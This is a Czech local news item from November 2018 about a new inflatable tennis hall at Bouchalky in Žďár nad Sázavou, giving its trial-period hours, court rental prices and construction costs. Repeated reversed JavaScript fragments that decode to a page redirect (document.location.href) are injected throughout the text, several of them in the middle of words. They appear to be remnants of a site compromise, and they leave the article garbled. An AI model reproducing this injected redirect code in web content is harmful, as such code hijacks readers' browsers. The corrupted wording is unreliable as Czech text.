Rainbow page separator

Tenisté mohou od prosince hrát v nové hale ve zkušebním režimu

Čtvrtek, 29. listopadu 2018

Žďár nad Sázavou / Ve zkušebním režimu bude od začátku prosince fungovat nová nafukovací tenisová hala ve spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní zóně na Bouchalkách. Ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to stav potrvá do 19. dubna.
Zájemci si tak mohou přijít zahrát tenis od pondělí do pátku od 7 do 14 hodin, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to za 200 korun za hodinu pronájmu jednoho kurtu pro všechny zájemce. Členové tenisového klubu mají v rámci zkušebního provozu vyhrazenu hrací dobu v pracovní dny od 14 do 18 hodin. Nafukovací hala bude v pracovní dny veřejnosti k dispozici také od šesti večer do půl desáté, přičemž hodina pronájmu jednoho kurtu vyjde na 300 korun pro všechny hráče. Tenis si bude možné zahrát i o víkendech, konkrétně od sedmi ráno do půl desáté večer – také za tři s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovky na hodinu. Po dobu zkušebního režimu nebudou k využití permanentky, počítá se s nimi až později.
Stavební činnosti související s vybudováním zázemí pro fotbal a tenis, s čímž je spojená i přestavba kurtů a montáž nafukovací haly, jsou naplánované na deset měsíců a vyjdou na 35,4 milionu korun bez DPH. Zahájeny byly v červnu, přičemž dotace, kterou měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na projekt získalo, činí patnáct milionů.